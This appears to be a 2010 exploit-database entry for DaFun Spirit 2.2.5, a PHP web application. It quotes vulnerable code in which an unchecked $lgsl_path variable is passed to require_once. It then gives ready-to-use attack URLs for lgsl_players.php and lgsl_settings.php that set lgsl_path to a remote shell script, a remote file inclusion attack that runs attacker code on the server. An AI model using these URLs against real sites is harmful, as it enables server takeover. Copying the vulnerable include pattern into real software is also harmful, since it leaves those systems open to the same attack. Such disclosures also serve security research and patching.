DaFun Spirit 2.2.5 - Multiple Remote File Inclusions

Author: 2010-03-26
type: webapps
platform: php
port: 
date_added: 2010-03-25 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/dafunspirit/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

Vuln Code

//-----------------------------------------------------------------------------------------------------------+

  $lgsl_path = ""; // RELATIVE PATH BETWEEN THIS FILE AND THE LGSL FOLDER FOR PAGE INTEGRATION

//-----------------------------------------------------------------------------------------------------------+

  require_once($lgsl_path."lgsl_protocol.php");

  $get_ip   = $_GET[ip];
  $get_port = $_GET[port];

//-----------------------------------------------------------------------------------------------------------+

Usage: http://[target]/[path]/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
       http://[target]/[path]/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]


Greetings: All Hackerz